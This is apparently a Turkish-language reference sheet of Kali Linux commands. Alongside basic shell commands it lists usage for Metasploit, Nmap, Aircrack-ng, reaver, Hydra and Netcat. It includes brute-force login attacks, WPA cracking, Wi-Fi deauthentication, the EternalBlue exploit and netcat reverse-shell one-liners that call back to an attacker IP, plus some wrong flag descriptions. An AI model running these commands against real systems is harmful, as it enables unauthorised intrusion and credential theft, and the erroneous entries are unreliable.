Kali Linux Komutları Özet

Kali Linux, siber güvenlik uzmanları ve etik hackerlar için geliştirilmiş Debian tabanlı bir Linux dağıtımıdır. İçerisinde birçok güvenlik ve sızma testi aracı barındırır. Aşağıda Kali Linux’ta sıkça kullanılan komutlar kategorilere ayrılarak listelenmiştir.


1. Temel Linux Komutları

KomutAçıklama
lsMevcut dizindeki dosyaları ve klasörleri listeler.
cd [dizin]Belirtilen dizine geçiş yapar.
pwdBulunduğunuz dizini gösterir.
mkdir [klasör_ismi]Yeni bir klasör oluşturur.
rm -rf [dosya/klasör]Dosya veya klasörü siler.
cp [kaynak] [hedef]Dosya veya klasörü kopyalar.
mv [kaynak] [hedef]Dosya veya klasörü taşır veya adını değiştirir.
find / -name [dosya]Dosya araması yapar.
cat [dosya]Dosyanın içeriğini görüntüler.
nano [dosya]Nano metin editörü ile dosyayı düzenler.
chmod 777 [dosya]Dosyanın izinlerini değiştirir.
chown [kullanıcı] [dosya]Dosya sahibini değiştirir.

2. Ağ ve İnternet Komutları

KomutAçıklama
ifconfigAğ arayüzü yapılandırmalarını gösterir.
ip aIP adreslerini listeler.
iwconfigKablosuz ağ bilgilerini gösterir.
ping [hedef]Belirtilen hedefe ping atar.
netstat -tulnpAktif bağlantıları listeler.
nmap [hedef]Ağ üzerindeki açık portları tarar.
whois [domain]Alan adı hakkında bilgi toplar.
wget [URL]Web sayfası veya dosya indirir.
curl [URL]Web isteği yapar ve çıktıyı gösterir.
traceroute [hedef]Bir paketin hedefe giden yolunu gösterir.
dig [domain]DNS bilgilerini gösterir.

3. Kullanıcı Yönetimi Komutları

KomutAçıklama
whoamiMevcut kullanıcıyı gösterir.
idKullanıcı ve grup kimlik bilgilerini gösterir.
whoSistemde oturum açan kullanıcıları listeler.
adduser [kullanıcı]Yeni kullanıcı ekler.
deluser [kullanıcı]Kullanıcıyı siler.
passwd [kullanıcı]Kullanıcının şifresini değiştirir.
su [kullanıcı]Başka bir kullanıcıya geçiş yapar.
sudo [komut]Yönetici yetkileriyle bir komut çalıştırır.

4. Dosya ve Dizin İşlemleri

KomutAçıklama
df -hDisk kullanımını gösterir.
du -sh [dizin]Bir dizinin kapladığı alanı gösterir.
mount /dev/sdX /mntDisk bölümlerini bağlar.
umount /mntBağlı disk bölümünü çıkarır.
fdisk -lDisk bölümlerini listeler.

5. Süreç Yönetimi Komutları

KomutAçıklama
ps auxÇalışan süreçleri listeler.
topSistem kaynak kullanımını canlı olarak gösterir.
htopDaha detaylı süreç yönetim ekranı açar.
kill [PID]Belirtilen süreci sonlandırır.
pkill [süreç_adı]Süreci isme göre sonlandırır.

6. Kali Linux Özel Komutları

KomutAçıklama
service apache2 startApache web sunucusunu başlatır.
airmon-ng start wlan0Kablosuz kartı monitor moda alır.
aircrack-ng [dosya.cap]WPA/WEP şifre kırma işlemi yapar.
msfconsoleMetasploit Framework’ü başlatır.
hydra -l admin -P passwords.txt 192.168.1.1 sshSSH brute-force saldırısı yapar.
john --wordlist=rockyou.txt hash.txtHash kırma işlemi yapar.
sqlmap -u "http://site.com/index.php?id=1" --dbsSQL enjeksiyon testi yapar.

Metasploit Framework (MSF), güvenlik testi ve sızma testi için son derece kapsamlı bir araçtır. Aşağıda, MSF’nin daha ayrıntılı komutlarını bulabilirsiniz:

Metasploit Komutları (Tam Liste)

Başlangıç Komutları:

KomutAçıklama
msfconsoleMetasploit Framework’ü başlatır.
exitMetasploit oturumunu kapatır.

Exploit ve Payload Yönetimi:

KomutAçıklama
search exploit [anahtar_kelime]Belirtilen anahtar kelimeye sahip exploitleri arar.
search payload [anahtar_kelime]Belirtilen anahtar kelimeye sahip payload’ları arar.
use exploit/[exploit_adı]Seçilen exploit’i kullanmaya başlar.
show optionsSeçilen exploit’in ayarlarını ve parametrelerini gösterir.
set [değişken_adı] [değer]Değişkeni ayarlar (örneğin set RHOST [hedef_IP]).
set PAYLOAD [payload_adı]Kullanılacak payload’ı seçer.
show payloadsKullanılabilir payload’ları gösterir.
set LHOST [saldırgan_IP]Saldırganın IP adresini ayarlar.
set LPORT [port_numarası]Saldırganın dinleyeceği portu belirler.
set RHOSTS [hedef_IP]Hedef IP adresini belirler.
set TARGET [hedef_tipi]Hedef sistemi (Windows, Linux vb.) belirler.
exploit veya runSeçilen exploit’i çalıştırır.
checkHedefin zafiyetinin olup olmadığını kontrol eder.
backKullanılan exploit’i geri alır ve ana menüye döner.

Payload ve Saldırı Türleri:

KomutAçıklama
show exploitsMevcut exploit’leri listeler.
show auxiliaryYardımcı modülleri (auxiliary) listeler.
show payloadsPayload’ları listeler.
show postPost-exploitation modüllerini gösterir.
set PAYLOAD [payload_adı]Seçilen payload’ı belirler.
set TARGET [hedef]Belirtilen hedefi ayarlar.

Oturum Yönetimi:

KomutAçıklama
sessionsMevcut aktif oturumları listeler.
sessions -i [ID]Seçilen oturuma bağlanır.
sessions -lTüm oturumları listeler.
sessions -k [ID]Belirtilen oturumu sonlandırır.
backgroundOturumu arka plana atar.
interact [session_ID]Bir oturuma etkileşimli olarak bağlanır.
migrate [PID]Meterpreter oturumunu başka bir sürece taşır.

Veritabanı ve Hedef Yönetimi:

KomutAçıklama
db_statusVeritabanı bağlantı durumunu gösterir.
db_nmap [hedef_IP]Nmap taramasını Metasploit veritabanına kaydederek çalıştırır.
db_import [dosya_adı]Veritabanasına yeni hedef bilgilerini ekler.
hostsTespit edilen hedefleri listeler.
servicesHedef üzerindeki servisleri listeler.
lootHedeften elde edilen dosyaları gösterir.

Saldırı ve İstismar Modülleri:

KomutAçıklama
use auxiliary/[modül_adı]Yardımcı bir modül kullanır.
use post/[modül_adı]Post-exploitation modülü kullanır.
use exploit/windows/smb/ms17_010_eternalblueBelirli bir exploit’i kullanır.
run -jSaldırıyı arka planda çalıştırır.
jobsArka planda çalışan işlemleri listeler.
kill [job_ID]Arka planda çalışan bir işlemi sonlandırır.

Ağ Yönlendirme ve Pivoting:

KomutAçıklama
route add [IP] [netmask] [session_ID]Pivoting ile hedef ağlar arasına yönlendirme ekler.
routeYönlendirme tablolarını gösterir.
pivotDiğer ağlara geçiş (pivoting) yapar.

Diğer Yardımcı Komutlar:

KomutAçıklama
help veya ?Metasploit komutlarının listelerini gösterir.
info [modül_adı]Seçilen modül hakkında bilgi verir.
exitMSF konsolundan çıkış yapar.

Veri Çekme ve Zafiyet Testi:

KomutAçıklama
hashdumpSistemdeki hash’leri çeker (Meterpreter oturumu gerektirir).
smb_enumusersSMB servisi üzerinde kullanıcı bilgilerini alır.
snifferAğı dinleyerek veri paketlerini toplar.
http_loginHTTP üzerinden login bilgilerini brute force ile denetler.
vnc_viewVNC bağlantısını kullanarak hedefe erişim sağlar.

Özel Modüller:

  • Exploit: Mevcut zafiyetleri kullanarak hedef sistemde komut çalıştırmaya yarar.
  • Auxiliary: Saldırı veya test amaçlı yardımcı modüllerdir (örneğin, taramalar, port dinlemeleri).
  • Post: Exploit sonrası sistemdeki bilgileri toplamak ve sistemdeki güvenlik açıklarını kullanmak için kullanılır.
  • Payload: Exploit başarıyla tamamlandığında hedef sisteme gönderilecek komutları içeren modüller.
  • Meterpreter: Hedef sisteme bağlandıktan sonra komutlar çalıştırmak, dosya yönetimi yapmak, ağ analizi yapmak gibi işler için kullanılan modül.

Metasploit komutları oldukça kapsamlıdır ve birçok farklı hedefe saldırı yapabilmek için çok sayıda modül sunmaktadır. Kullanıcıların amacına göre komutları seçmeleri, hedefe yönelik doğru modülleri kullanmaları önemlidir.

Nmap (Network Mapper), ağ taraması ve güvenlik denetimi için en yaygın kullanılan araçlardan biridir. Aşağıda, Nmap komutlarının tam listesi ve açıklamaları bulunmaktadır. Bu komutlar, hedef ağları analiz etmek, açık portları tespit etmek ve güvenlik değerlendirmesi yapmak için kullanılır.

Nmap Temel Komutlar ve Kullanım

Temel Kullanım:

KomutAçıklama
nmap [hedef]Belirtilen hedefi tarar. Hedef IP, ağ veya alan adı olabilir.
nmap -v [hedef]Tarama çıktısını daha ayrıntılı olarak gösterir (verbose).
nmap -oN [dosya_adı] [hedef]Tarama sonuçlarını normal formatta belirtilen dosyaya kaydeder.
nmap -oX [dosya_adı] [hedef]Tarama sonuçlarını XML formatında belirtilen dosyaya kaydeder.
nmap -oG [dosya_adı] [hedef]Tarama sonuçlarını “grepable” formatında kaydeder (grep ile analiz için uygun).
nmap -oA [dosya_adı] [hedef]Tarama sonuçlarını hem normal, XML hem de “grepable” formatlarda kaydeder.

Port Tarama:

KomutAçıklama
nmap -p [port_numarası] [hedef]Belirtilen portu hedef üzerinde tarar. Örneğin, nmap -p 80 192.168.1.1 sadece 80 numaralı portu tarar.
nmap -p 1-1000 [hedef]Hedefteki 1 ile 1000 arasındaki portları tarar.
nmap -p T:1-1000 [hedef]TCP portları arasında 1 ile 1000 arasını tarar.
nmap -p U:53,161,162 [hedef]UDP portları 53, 161, 162’yi tarar.
nmap -p- [hedef]Tüm portları (1’den 65535’e kadar) tarar.

Tarama Tipleri:

KomutAçıklama
nmap -sS [hedef]SYN taraması (Stealth tarama) yapar. Hedefe tam bağlantı kurulmaz, bu nedenle hedef tarafında daha az tespit edilebilir.
nmap -sT [hedef]TCP bağlantı taraması yapar. Bu tarama, tam bağlantı kurar (üçlü el sıkışma).
nmap -sU [hedef]UDP portlarını tarar.
nmap -sA [hedef]ARP taraması yapar, ağda gizlilik sağlar.
nmap -sF [hedef]FIN taraması yapar. Bağlantıyı kapatmadan açık portları bulmaya çalışır.
nmap -sX [hedef]Xmas taraması yapar. TCP bayrakları ile anormal trafik oluşturur, bazı sistemleri yanıltabilir.
nmap -sN [hedef]Null taraması yapar. Bağlantı kurmak için hiçbir bayrak kullanmaz.
nmap -sY [hedef]SCTP INIT taraması yapar. SCTP protokolü üzerinden tarama yapar.

Hedef Belirleme ve Genişletme:

KomutAçıklama
nmap [hedef1] [hedef2]Birden fazla hedefi aynı anda tarar. Örneğin, nmap 192.168.1.1 192.168.1.2.
nmap [hedef]/[subnet_mask]Alt ağ taraması yapar. Örneğin, nmap 192.168.1.0/24 tüm 192.168.1.x alt ağını tarar.
nmap -iL [dosya_adı]Dosyadaki IP’leri içeren hedef listesine göre tarama yapar.
nmap -iR [random_count]Rastgele belirli sayıda hedef tarar.

Ping Tarama ve Hedef Aktifliği:

KomutAçıklama
nmap -sn [hedef]Ping taraması yapar, aktif cihazları listeler (port taraması yapılmaz).
nmap -Pn [hedef]Hedefe ping atılmadan tarama yapar (ping engellenmişse kullanılır).
nmap -PE [hedef]ICMP echo (ping) taraması yapar.
nmap -PS [port] [hedef]Belirtilen portu kullanarak bir SYN ping taraması yapar.
nmap -PU [port] [hedef]Belirtilen UDP portu üzerinden bir ping taraması yapar.

OS ve Servis Tespiti:

KomutAçıklama
nmap -O [hedef]Hedef sistemin işletim sistemi türünü tespit eder.
nmap -sV [hedef]Hedef sistemdeki servislerin sürüm bilgilerini tespit eder.
nmap --os-fingerprint [hedef]Hedef sistemin işletim sistemi parmak izini çıkarır.
nmap -A [hedef]OS tespiti, servis sürüm tespiti, script taraması ve traceroute ile kapsamlı bir tarama yapar.
nmap -sC [hedef]Nmap’in varsayılan script’lerini kullanarak güvenlik zafiyetlerini arar.

Firewall ve Paket Filtreleme Tespiti:

KomutAçıklama
nmap -sF [hedef]FIN taraması ile hedefin bir firewall ya da paket filtresi olup olmadığını kontrol eder.
nmap -sI [proxy_hedef] [hedef]Proxy veya başka bir aracı cihaz üzerinden tarama yapar.
nmap --traceroute [hedef]Ağ yolunu (trace) izler ve hedefe ulaşana kadar hangi cihazların üzerinden geçildiğini gösterir.
nmap --badsum [hedef]Hedefe kötü toplam (checksum) veri gönderir, bazı firewall’ları geçmeyi amaçlar.

Script Tabanlı Tarama:

KomutAçıklama
nmap --script [script_adı] [hedef]Belirli bir script’i kullanarak hedefi tarar. Örneğin, nmap --script http-vuln-cve2006-3392 [hedef].
nmap --script=default [hedef]Nmap’in varsayılan script’lerini çalıştırır.
nmap --script=exploit [hedef]Exploit script’leri kullanarak güvenlik açıklarını tespit eder.

Diğer Faydalı Komutlar:

KomutAçıklama
nmap -T4 [hedef]Tarama hızını artırır. T1 ile T5 arasında hız ayarı yapılabilir (T4 genellikle önerilir).
nmap -p [port1,port2,...] [hedef]Birden fazla portu tarar.
nmap -A [hedef]OS tespiti, versiyon analizi, script kullanımı ve traceroute içeren kapsamlı bir tarama yapar.

Özet:

  • Port Taraması: Nmap, belirli portları veya tüm port aralıklarını taramak için çok güçlüdür.
  • OS ve Servis Tespiti: Nmap, hedef cihazların işletim sistemlerini ve çalışan servislerini belirlemek için çok etkilidir.
  • Gizlilik ve Saldırı Taktikleri: Nmap, hedefi tespit edilmeden taramak için çeşitli “stealth” yöntemler sunar.
  • Ağ İlişkileri: Traceroute gibi araçlarla ağda hedefe giden yolu izleyebilirsiniz.

Bu komutları kullanarak hedef ağları tarayabilir, servisler ve güvenlik açıklarını analiz edebilirsiniz. Nmap, sürekli gelişen bir araçtır, bu yüzden en güncel versiyonla çalışmak önemlidir.

Aircrack-ng, kablosuz ağların güvenlik testlerini yapmak için kullanılan güçlü bir araçtır. Bu araç, kablosuz ağ şifrelemesini kırmak ve ağlardaki güvenlik açıklarını test etmek için yaygın olarak kullanılır. Aircrack-ng, çok sayıda yardımcı araç ve komut sunarak çeşitli kablosuz ağ testlerini yapmanıza olanak tanır.

Aircrack-ng Komutları ve Kullanımı

Başlangıç Komutları:

KomutAçıklama
airmon-ngKablosuz ağ kartlarını monitör modunda başlatmak için kullanılan araçtır.
airmon-ng start [arayüz]Belirtilen ağ kartını monitör modunda başlatır.
airmon-ng stop [arayüz]Monitör modunda çalışan ağı durdurur.
airmon-ng check killKablosuz kart ile çakışan hizmetleri öldürür.
airmon-ngSistemdeki tüm ağ kartlarını ve durumlarını listeler.

Ağ Tespiti Komutları:

KomutAçıklama
airodump-ng [arayüz]Çevredeki tüm kablosuz ağları tarar. Çevredeki ağlar hakkında bilgiler toplar (SSID, kanal, şifreleme türü vb.).
airodump-ng -c [kanal] [arayüz]Belirtilen kanal üzerinde kablosuz ağları tarar.
airodump-ng --bssid [MAC_adresi] -c [kanal] [arayüz]Belirtilen BSSID (MAC adresi) için ağın trafiğini izler.
airodump-ng -w [dosya_adı] [arayüz]Taranan ağ verilerini belirtilen dosyaya kaydeder.

WEP/Kenel Şifreleme Kırma:

KomutAçıklama
aircrack-ng [dosya_adı]-01.cap.cap dosyasındaki WEP anahtarını kırar.
aircrack-ng -b [BSSID] -w [kelime_listesi.txt] [dosya_adı]-01.capWEP şifrelemesi için saldırı yapar, belirli bir BSSID için anahtarı kırmaya çalışır.
aircrack-ng -b [BSSID] -l [output_file.txt] [dosya_adı]-01.capWEP şifresini çözerek çıkan anahtarı belirtilen dosyaya kaydeder.

WPA/WPA2 Şifreleme Kırma:

KomutAçıklama
airodump-ng -c [kanal] --bssid [BSSID] -w [dosya_adı] [arayüz]WPA/WPA2 handshake (anahtar alışverişi) yakalamak için kullanılan komut.
aircrack-ng -w [kelime_listesi.txt] [dosya_adı]-01.capWPA şifresini kırmak için dictionary saldırısı yapar.
aircrack-ng -b [BSSID] -w [kelime_listesi.txt] [dosya_adı]-01.capWPA şifresini kırar, kelime listesi kullanarak brute-force saldırısı yapar.

Ağ Denetimi ve Şifreleme Çalışmaları:

KomutAçıklama
aireplay-ng -0 [paket_sayısı] -a [BSSID] -c [MAC_adresi] [arayüz]Deauthentication saldırısı yapar. Bu saldırı, istemcilerin kablosuz ağdan çıkmasına neden olur.
aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC_adresi] [arayüz]Kablosuz ağa sahte bağlantı yaparak hedef ağın zayıf noktalarını keşfetmeye çalışır (authentication saldırısı).
aireplay-ng -3 -b [BSSID] -h [MAC_adresi] [arayüz]ARP request (adres çözümleme protokolü) saldırısı yapar, ağ trafiği üretir.
aireplay-ng -9 [arayüz]Paket enjeksiyonu yaparak bir ağın performansını test eder.

WPA/WPA2 Handshake Paketini Yakalama:

KomutAçıklama
airodump-ng --bssid [BSSID] -c [kanal] -w [dosya_adı] [arayüz]WPA/WPA2 handshake paketini yakalar, belirtilen BSSID ve kanal üzerinden.
airodump-ng --bssid [BSSID] -c [kanal] --write [dosya_adı] [arayüz]Handshake paketini kaydeder ve şifre çözme işlemi için hazır hale getirir.

WPS Pin Brute Force Saldırısı (WPS Zayıflığına Saldırı):

KomutAçıklama
reaver -i [arayüz] -b [BSSID] -c [kanal] -vvWPS PIN brute-force saldırısı yapar. Bu saldırı, WPS (Wi-Fi Protected Setup) zayıflıklarını hedef alır.
reaver -i [arayüz] -b [BSSID] -c [kanal] --no-nacks -vvWPS PIN brute-force saldırısını, yanıtları beklemeyerek hızlandırır.
reaver -i [arayüz] -b [BSSID] -c [kanal] --pin [PIN] -vvBelirli bir WPS PIN ile brute-force saldırısı yapar.

Diğer Aircrack-ng Yardımcı Komutlar:

KomutAçıklama
airmon-ng checkKablosuz ağ kartını kontrol eder, çakışan süreçleri listeler.
airmon-ng start [arayüz]Kablosuz ağ kartını monitör moduna geçirir.
airodump-ng -w [dosya_adı] [arayüz]Çevredeki ağları izler ve elde edilen verileri kaydeder.
aircrack-ng -b [BSSID] -w [wordlist.txt] [capture_file.cap]WPA şifresini kırar ve belirtilen kelime listesiyle brute force saldırısı yapar.

Ağ Denetimleri ve Saldırılar:

KomutAçıklama
airmon-ng stop [arayüz]Monitör modunda çalışan ağı durdurur.
airodump-ng --write [dosya_adı] [arayüz]Taranan ağ verilerini kaydeder.
airodump-ng --bssid [BSSID] --write [dosya_adı] --channel [kanal]Belirli bir BSSID için trafiği izler ve kaydeder.

Özetle:

Aircrack-ng, kablosuz ağların güvenliğini test etmek için kullanılan güçlü bir araçtır. Bu komutlar, ağları tarama, şifre çözme ve çeşitli saldırıları gerçekleştirme imkanı sunar. WEP ve WPA şifreleme yöntemlerine karşı zayıf noktalar bularak ağların güvenliğini artırmak için kullanılabilir. Aircrack-ng’nin tüm bu fonksiyonları, sızma testlerinde ve ağ güvenliği değerlendirmelerinde önemli bir rol oynar

Hydra, bir brute force (kaba kuvvet) saldırı aracıdır ve çeşitli protokoller üzerinden parola tahminleri yapmak için kullanılır. Hydra, parola doğrulama mekanizmalarındaki zayıf noktaları test etmek ve kullanıcı adı/parola kombinasyonlarını denemek amacıyla kullanılır. Çeşitli ağ protokollerine ve servislerine yönelik geniş bir desteğe sahiptir.

Aşağıda, Hydra için kullanılan komutlar ve açıklamaları yer almaktadır.

Hydra Komut Seti

Temel Komut Yapısı:

cssKopyalaDüzenlehydra [options] [target] [service]
  • options: Hydra’nın çalışma şeklini belirleyen seçeneklerdir.
  • target: Hedef IP adresi veya alan adı.
  • service: Kullanılacak servis (SSH, FTP, HTTP, vb.).

Temel Hydra Komutları ve Açıklamaları:

KomutAçıklama
hydra -l [kullanıcı_adı] -P [parola_listesi] [hedef_ip] [servis]Belirli bir kullanıcı adı ile parolaları denemek için brute-force saldırısı başlatır.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Belirli bir parola listesiyle, çoklu kullanıcı adı üzerinde brute-force saldırısı yapar.
hydra -t [işlem_sayısı] -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Paralel işlemlerle saldırıyı hızlandırır. -t seçeneği ile işlemler sayısı belirlenir.
hydra -vV -l [kullanıcı_adı] -P [parola_listesi] [hedef_ip] [servis]Detaylı çıktı sağlar (-vV); her denemeyi ve deneme sonucu hakkında bilgi gösterir.
hydra -v -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Detaylı çıktı ile kullanıcı/parola kombinasyonları ile saldırı yapar.
hydra -o [output_file] -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Sonuçları belirtilen dosyaya kaydeder.
hydra -t 4 -l root -P [parola_listesi] [hedef_ip] sshSSH servisinde “root” kullanıcısının şifresini kırmaya çalışır.

Servisler için Hydra Komutları

KomutAçıklama
hydra -l [kullanıcı_adı] -P [parola_listesi] [hedef_ip] ftpFTP servisi üzerinde brute-force saldırısı yapar.
hydra -l [kullanıcı_adı] -P [parola_listesi] [hedef_ip] sshSSH servisi üzerinde brute-force saldırısı yapar.
hydra -l [kullanıcı_adı] -P [parola_listesi] [hedef_ip] http-getHTTP GET isteği ile web uygulamalarındaki parola girişlerini test eder.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] smtpSMTP üzerinden parola denemeleri yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] smbSMB (Windows file sharing) servisi üzerinden brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] pop3POP3 servisi üzerinden brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] imapIMAP servisi üzerinden brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] mysqlMySQL servisi üzerinden brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] rdpRDP (Remote Desktop Protocol) üzerinden brute-force saldırısı yapar.

Ekstra Parametreler ve İleri Seviye Seçenekler

KomutAçıklama
hydra -vV -f -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Başarılı ilk sonucu bulur ve çıkış yapar (-f parametresi ile).
hydra -l [kullanıcı_adı] -P [parola_listesi] -t 4 [hedef_ip] ftp4 paralel işlemle FTP brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] -s [port_numarası] [hedef_ip] [servis]Belirtilen port üzerinde brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] -f [hedef_ip] [servis]İlk başarıyla çıkışı sağlar (ilk başarı bulunduğunda işlemi bitirir).
hydra -L [kullanıcı_listesi] -P [parola_listesi] -t 8 -v [hedef_ip] [servis]8 paralel iş parçacığı ile saldırı yapar ve tüm çıktıları ayrıntılı gösterir.
hydra -s [port_numarası] -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] [servis]Özel port numarası üzerinden hedefi test eder.
hydra -l [kullanıcı_adı] -P [parola_listesi] -t 10 -vV [hedef_ip] sshSSH servisine yönelik 10 paralel iş parçacığıyla saldırı yapar.
hydra -l [kullanıcı_adı] -P [parola_listesi] -f -v -v [hedef_ip] [servis]Aynı kullanıcı adı ile brute-force saldırısını iki kat detaylı şekilde yapar.

Sonuçların Kaydedilmesi:

KomutAçıklama
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] ftp -o [output_file]Sonuçları belirtilen dosyaya kaydeder.
hydra -L [kullanıcı_listesi] -P [parola_listesi] [hedef_ip] ssh -o [output_file]Sonuçları belirtilen dosyaya kaydeder.

Proxy ve SSL Destekli Komutlar:

KomutAçıklama
hydra -L [kullanıcı_listesi] -P [parola_listesi] -s [port_numarası] -u -S [hedef_ip] http-getSSL şifreli HTTP sunucusunda brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] -s [port_numarası] -u [hedef_ip] httpsHTTPS üzerinden brute-force saldırısı yapar.
hydra -L [kullanıcı_listesi] -P [parola_listesi] -p [proxy] [hedef_ip] [servis]Proxy üzerinden bağlantı yaparak saldırı gerçekleştirir.

Özetle:

Hydra, geniş protokol desteği ve çok sayıda özelleştirme seçeneğiyle güçlü bir brute force aracı olarak sızma testleri ve ağ güvenliği değerlendirmelerinde yaygın olarak kullanılmaktadır. Yukarıdaki komut seti, Hydra’yı en verimli şekilde kullanmanıza yardımcı olacaktır. Komutlar, her servisin ve saldırı türünün ihtiyaçlarına göre özelleştirilebilir ve birçok parametre ile birleştirilebilir.

Netcat (nc), ağ bağlantıları üzerinde veri iletimi yapmak, port taraması, dinleme, geri bağlantı (reverse shell) kurma gibi işlemleri gerçekleştiren çok güçlü bir ağ aracıdır. Netcat, aynı zamanda güvenlik testlerinde, özellikle sızma testlerinde sıklıkla kullanılır. “Ağların Swiss Army bıçağı” olarak adlandırılabilir çünkü çok çeşitli işlevlere sahiptir. Aşağıda, Netcat (nc) komutları ve açıklamaları yer almaktadır:

Netcat Temel Komutları ve Kullanımı

1. Netcat ile Bağlantı Kurma (Client Mode)

Netcat ile belirli bir IP adresi ve port numarasına bağlantı kurabilirsiniz. Bu, genellikle bir servise bağlanmak veya test etmek için kullanılır.

cssKopyalaDüzenlenc [hedef_ip] [port_numarası]
  • Örnek: nginxKopyalaDüzenlenc 192.168.1.10 80 Bu komut, 192.168.1.10 IP adresindeki 80 numaralı port ile bağlantı kurar.

2. Netcat ile Dinleme Yapma (Listener Mode)

Netcat’i bir dinleyici (listener) olarak başlatarak, belirli bir port üzerinde bağlantı bekleyebilirsiniz.

cssKopyalaDüzenlenc -l [port_numarası]
  • Örnek: yamlKopyalaDüzenlenc -l 1234 Bu komut, bilgisayarınızı 1234 numaralı portta dinleyen bir sunucu haline getirir.

3. Netcat ile Geri Bağlantı (Reverse Shell) Kurma

Netcat, ters bağlantı (reverse shell) kurmak için kullanılır. Bu, bir hedef makinenin dışarıya doğru bir bağlantı kurmasını sağlayarak, sızma testlerinde oldukça yaygın bir tekniktir.

cssKopyalaDüzenlenc -e /bin/bash [saldırgan_ip] [port_numarası]
  • Örnek: nginxKopyalaDüzenlenc -e /bin/bash 192.168.1.5 4444 Bu komut, hedef makineden 192.168.1.5 IP adresine ve 4444 port numarasına bir bağlantı kurar ve ardından bir terminal erişimi açar.

4. Netcat ile Dosya Gönderme

Bir dosyayı ağ üzerinden göndermek için Netcat kullanılabilir. Bu işlem, basit bir şekilde bir bilgisayardan diğerine dosya aktarımı yapmanızı sağlar.

  • Gönderen: cssKopyalaDüzenlenc -l [port_numarası] < [dosya_adı]
  • Alıcı: cssKopyalaDüzenlenc [hedef_ip] [port_numarası] > [dosya_adı]
  • Örnek:
    • Gönderen: yamlKopyalaDüzenlenc -l 1234 < dosya.txt
    • Alıcı: nginxKopyalaDüzenlenc 192.168.1.10 1234 > alinan_dosya.txt

5. Netcat ile Port Tarama

Netcat ile belirli bir port aralığında tarama yapabilirsiniz. Bu, ağ üzerindeki açık portları test etmek için kullanışlıdır.

cssKopyalaDüzenlenc -zv [hedef_ip] [başlangıç_portu]-[bitiş_portu]
  • Örnek: nginxKopyalaDüzenlenc -zv 192.168.1.10 1-1000 Bu komut, 192.168.1.10 IP adresindeki 1 ile 1000 arasındaki portları tarar ve açık portları listeleyecektir.

6. Netcat ile Web Sunucusuna HTTP İsteği Gönderme

Netcat ile HTTP istekleri göndererek, web servislerini test edebilir ve çalıştığını doğrulayabilirsiniz.

swiftKopyalaDüzenleecho -e "GET / HTTP/1.1\r\nHost: [hedef_ip]\r\n\r\n" | nc [hedef_ip] 80
  • Örnek: swiftKopyalaDüzenleecho -e "GET / HTTP/1.1\r\nHost: 192.168.1.10\r\n\r\n" | nc 192.168.1.10 80 Bu komut, 192.168.1.10 IP adresine ve 80 numaralı HTTP portuna bir GET isteği gönderir.

7. Netcat ile UDP Bağlantısı Kurma

Netcat, TCP’nin yanı sıra UDP protokolü ile de bağlantılar kurabilir. Bu özellik, UDP üzerinden veri iletimi yapmak için kullanılabilir.

cssKopyalaDüzenlenc -u [hedef_ip] [port_numarası]
  • Örnek: nginxKopyalaDüzenlenc -u 192.168.1.10 53 Bu komut, 192.168.1.10 IP adresine ve 53 numaralı UDP portuna bağlantı kurar.

8. Netcat ile Veri İletişimi Yapma

Netcat üzerinden veri iletimi yapmak oldukça basittir. Bağlantı kurulduğunda, terminalde yazdığınız her şey karşı tarafa iletilir.

cssKopyalaDüzenlenc [hedef_ip] [port_numarası]

Bu komut, belirttiğiniz IP adresi ve port numarasına veri gönderir. Karşı tarafta Netcat çalışıyorsa, iletilen veriler hemen görülecektir.

9. Netcat ile Ağ Trafiğini Dinleme (Proxy gibi)

Netcat, bir proxy işlevi görerek, bir ağ trafiğini yönlendirebilir. Bu, belirli bir porttan gelen trafiği başka bir port üzerinden yönlendirmek için kullanılabilir.

lessKopyalaDüzenlenc -l -p [dinleme_portu] | nc [hedef_ip] [hedef_portu]
  • Örnek: nginxKopyalaDüzenlenc -l -p 1234 | nc 192.168.1.10 80 Bu komut, 1234 numaralı portu dinler ve gelen veriyi 192.168.1.10 IP adresine ve 80 numaralı portuna yönlendirir.

Ekstra Parametreler ve İleri Seviye Seçenekler

KomutAçıklama
-vNetcat’i “verbose” modunda çalıştırarak daha ayrıntılı çıktı alırsınız.
-zTarama sırasında bağlantı kurmadan sadece portların açık olup olmadığını kontrol eder.
-nDNS çözümlemesi yapmaz, doğrudan IP adresi ile işlem yapar.
-w [süre]Bağlantı zaman aşımını belirler.
-uUDP bağlantılarını kullanır.
-pDinleme portunu belirtir.
-eBelirtilen programı çalıştırır (örneğin, bir shell).

Örnekler:

  1. Netcat ile Geri Bağlantı Yapma (Reverse Shell):
    • Saldırgan tarafı: cssKopyalaDüzenlenc -l -p 4444
    • Hedef tarafı: bashKopyalaDüzenlenc -e /bin/bash [saldırgan_ip] 4444
  2. Netcat ile Dinleme Yapma (Listener): cssKopyalaDüzenlenc -l -p 12345
  3. Netcat ile Dosya Gönderme (UDP):
    • Gönderen: cssKopyalaDüzenlenc -u -l -p 1234 < dosya.txt
    • Alıcı: cssKopyalaDüzenlenc -u [hedef_ip] 1234 > alinan_dosya.txt

Netcat Kullanım Alanları:

  • Port tarama ve test etme: Netcat, ağdaki açık portları taramak için etkili bir araçtır.
  • Dosya transferi: Ağ üzerinden dosya göndermek için hızlı ve pratik bir yöntem sunar.
  • Shell erişimi sağlama: Sızma testlerinde kullanılan reverse shell gibi saldırılar için Netcat, oldukça etkili bir araçtır.
